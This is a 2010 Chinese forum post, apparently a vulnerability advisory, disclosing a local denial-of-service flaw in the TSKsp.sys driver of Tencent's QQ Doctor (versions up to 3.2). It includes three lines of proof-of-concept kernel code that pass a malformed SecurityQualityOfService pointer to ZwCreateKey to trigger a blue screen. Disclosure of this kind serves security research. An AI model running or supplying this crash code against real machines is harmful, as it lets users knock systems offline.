-
-
[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞
-
发表于:
2010-2-19 14:37
6285
-
[原创]QQ医生 <= 3.2 内核驱动程序ZwCreateKey HOOK 本地拒绝服务漏洞
影响版本:
QQ医生 <= 3.2
发布时间:2010-02-19
漏洞描述:
QQ医生是腾讯公司开发的一个安全辅助工具,其用于实现注册表拦截等功能的驱动程序TSKsp.sys没有对ZwCreateKey的参数做完整的检查就直接传递给 ZwOpenKey,此时位于内核模式系统会直接使用参数中的内容,不作任何检查,因此攻击者可构造特殊的参数,使系统蓝屏
利用代码:
InitializeObjectAttributes(&ObjectAttributes , &name , 0 , 0 , 0 );
ObjectAttributes.SecurityQualityOfService = (PVOID)0x80000000;
ZwCreateKey(&KeyHandle , 0 , &ObjectAttributes , 0 , 0 , 0 , 0 );
安装了QQ医生的机器上运行上面三行代码,系统即告蓝屏
[课程]FART 脱壳王!加量不加价!FART作者讲授!
